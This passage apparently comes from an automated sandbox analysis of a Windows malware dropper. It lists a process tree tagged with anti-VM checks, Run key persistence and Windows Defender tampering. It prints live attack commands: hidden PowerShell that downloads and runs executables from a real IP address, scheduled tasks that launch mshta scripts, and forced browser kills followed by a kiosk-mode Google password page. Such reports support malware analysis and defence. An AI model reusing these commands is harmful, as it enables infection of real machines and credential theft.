memory of 688 2584 cmd.exe 48 PID 2584 wrote to memory of 688 2584 cmd.exe 48 PID 2584 wrote to memory of 688 2584 cmd.exe 48 PID 1592 wrote to memory of 2160 1592 taskeng.exe 50 PID 1592 wrote to memory of 2160 1592 taskeng.exe 50 PID 1592 wrote to memory of 2160 1592 taskeng.exe 50 PID 1592 wrote to memory of 2160 1592 taskeng.exe 50 PID 1648 wrote to memory of 2896 1648 skotes.exe 51 PID 1648 wrote to memory of 2896 1648 skotes.exe 51 PID 1648 wrote to memory of 2896 1648 skotes.exe 51 PID 1648 wrote to memory of 2896 1648 skotes.exe 51 PID 1780 wrote to memory of 2784 1780 powershell.exe 52 PID 1780 wrote to memory of 2784 1780 powershell.exe 52 PID 1780 wrote to memory of 2784 1780 powershell.exe 52 PID 1780 wrote to memory of 2784 1780 powershell.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe"C:\Users\Admin\AppData\Local\Temp\2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"C:\Users\Admin\AppData\Local\Temp\1086173001\oVpNTUm.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"C:\Users\Admin\AppData\Local\Temp\1086621001\3omTNLZ.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1248
-
-
C:\Users\Admin\AppData\Local\Temp\1086705101\257584c93d.exe"C:\Users\Admin\AppData\Local\Temp\1086705101\257584c93d.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 6EzkXmaFVt8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\uSchx07o1.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 6EzkXmaFVt8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\uSchx07o1.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2144
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\uSchx07o1.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Users\Admin\AppData\Local\TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE"C:\Users\Admin\AppData\Local\TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1086706021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:2144 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "U7swHmaDPix" /tr "mshta \"C:\Temp\HjO2Z8DvW.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2664
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\HjO2Z8DvW.hta"5⤵
- System Location Discovery: System Language Discovery
PID:2660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2716
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2896 -
C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
PID:1348
-
-
C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
PID:2656
-
-
C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"C:\Users\Admin\AppData\Local\Temp\1086707001\Ta3ZyUR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2096
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 5844⤵
- Loads dropped DLL
- Program crash
PID:2368
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086708001\d2YQIJa.exe"C:\Users\Admin\AppData\Local\Temp\1086708001\d2YQIJa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2164
-
-
C:\Users\Admin\AppData\Local\Temp\1086719001\2f051bfec5.exe"C:\Users\Admin\AppData\Local\Temp\1086719001\2f051bfec5.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2224 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:948
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086720001\892cde147c.exe"C:\Users\Admin\AppData\Local\Temp\1086720001\892cde147c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2764 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086721001\51798fd265.exe"C:\Users\Admin\AppData\Local\Temp\1086721001\51798fd265.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\1086722001\2dcd38c299.exe"C:\Users\Admin\AppData\Local\Temp\1086722001\2dcd38c299.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Users\Admin\AppData\Local\Temp\1086723001\3f44d4da90.exe"C:\Users\Admin\AppData\Local\Temp\1086723001\3f44d4da90.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2296 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2296 -s 8884⤵
- Loads dropped DLL
- Program crash
PID:2288
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086724001\amnew.exe"C:\Users\Admin\AppData\Local\Temp\1086724001\amnew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1916 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3676 -
C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3676 -s 5566⤵
- Loads dropped DLL
- Program crash
PID:3136
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008020101\8bf3eae87e.exe"C:\Users\Admin\AppData\Local\Temp\10008020101\8bf3eae87e.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3260 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:2584
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2292 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.0.451328319\583435430" -parentBuildID 20221007134813 -prefsHandle 1208 -prefMapHandle 1200 -prefsLen 21196 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {55a3e374-a35b-46be-88e7-df8b8bbc00f6} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 1292 136f7858 gpu8⤵PID:3440
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.1.375965718\1732964267" -parentBuildID 20221007134813 -prefsHandle 1476 -prefMapHandle 1472 -prefsLen 22057 -prefMapSize 233548 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fe9c4358-29a7-4568-b5ac-4049a6db4aec} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 1488 3fed258 socket8⤵PID:1748
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.2.476967381\766125892" -childID 1 -isForBrowser -prefsHandle 2128 -prefMapHandle 1952 -prefsLen 22160 -prefMapSize 233548 -jsInitHandle 848 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b71eb7e-cf79-4604-8a8d-0a3c08d7a161} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 1936 19eddb58 tab8⤵PID:3536
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.3.1310913819\523120997" -childID 2 -isForBrowser -prefsHandle 2716 -prefMapHandle 2712 -prefsLen 26416 -prefMapSize 233548 -jsInitHandle 848 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5ba3cee-ba41-4fd0-a604-8b8b70850154} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 2732 f64858 tab8⤵PID:2884
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.4.577284799\609978067" -childID 3 -isForBrowser -prefsHandle 3448 -prefMapHandle 3444 -prefsLen 26416 -prefMapSize 233548 -jsInitHandle 848 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {69c822d3-fbea-48d1-b1a7-f1a56788999d} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 3460 f2ed58 tab8⤵PID:3816
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.5.52587262\791017943" -childID 4 -isForBrowser -prefsHandle 3572 -prefMapHandle 3576 -prefsLen 26416 -prefMapSize 233548 -jsInitHandle 848 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ffa676c6-a580-47c3-9975-c54f91579675} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 3560 3fed858 tab8⤵PID:1912
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2292.6.672664237\1660891747" -childID 5 -isForBrowser -prefsHandle 3716 -prefMapHandle 3720 -prefsLen 26416 -prefMapSize 233548 -jsInitHandle 848 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a20127a-b1d4-4a2c-bb6e-7d71056560e6} 2292 "\\.\pipe\gecko-crash-server-pipe.2292" 3476 195e3858 tab8⤵PID:2112
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10008030101\8f4869ffea.exe"C:\Users\Admin\AppData\Local\Temp\10008030101\8f4869ffea.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3656 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵PID:4116
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086725001\90e0ad4bc6.exe"C:\Users\Admin\AppData\Local\Temp\1086725001\90e0ad4bc6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2420
-
-
C:\Users\Admin\AppData\Local\Temp\1086726001\257dc22f39.exe"C:\Users\Admin\AppData\Local\Temp\1086726001\257dc22f39.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\1086727001\f63e940856.exe"C:\Users\Admin\AppData\Local\Temp\1086727001\f63e940856.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2100 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:2080
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2696 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.0.819346737\947158833" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1172 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4e32939-6556-432a-a8a3-dc09409d75fa} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 1320 109cca58 gpu6⤵PID:1752
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.1.1036613929\920256364" -parentBuildID 20221007134813 -prefsHandle 1496 -prefMapHandle 1492 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e1880dc-27d1-4e00-9706-b5399a2b7414} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 1524 43eeb58 socket6⤵PID:1196
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.2.87585882\766613505" -childID 1 -isForBrowser -prefsHandle 2096 -prefMapHandle 2092 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6cf7132d-fd1e-4fc7-9b5f-7f5a989b7a37} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 2108 16ae9958 tab6⤵PID:2136
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.3.116277161\1685674492" -childID 2 -isForBrowser -prefsHandle 2952 -prefMapHandle 2948 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b55a61c8-b0e8-46b7-b1f3-405fa424feda} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 2964 1cc33658 tab6⤵PID:2200
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.4.935229235\292997040" -childID 3 -isForBrowser -prefsHandle 3496 -prefMapHandle 1056 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {81e14174-5b6b-4fc3-9fff-04a709213a5b} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 3536 1abfbc58 tab6⤵PID:3628
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.5.1468105105\263862616" -childID 4 -isForBrowser -prefsHandle 3636 -prefMapHandle 3088 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3c35fdf-2e85-4e13-bef2-d3fb338d326b} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 3620 1e247258 tab6⤵PID:3636
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.6.1088693780\1935400186" -childID 5 -isForBrowser -prefsHandle 3740 -prefMapHandle 3736 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 704 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d6b67e9-9b64-45d7-95c4-83e8ec93c0f7} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 3888 1e245d58 tab6⤵PID:3660
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2696.7.1415253781\1887522229" -parentBuildID 20221007134813 -prefsHandle 1332 -prefMapHandle 2276 -prefsLen 26607 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4efefb8-c347-4758-be27-3a1e5c9d247d} 2696 "\\.\pipe\gecko-crash-server-pipe.2696" 2100 f2ff58 gpu6⤵PID:3044
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1086728001\636ca944cf.exe"C:\Users\Admin\AppData\Local\Temp\1086728001\636ca944cf.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2540 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn jIAOymaFQfO /tr "mshta C:\Users\Admin\AppData\Local\Temp\XrUF18pmZ.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
PID:1084 -
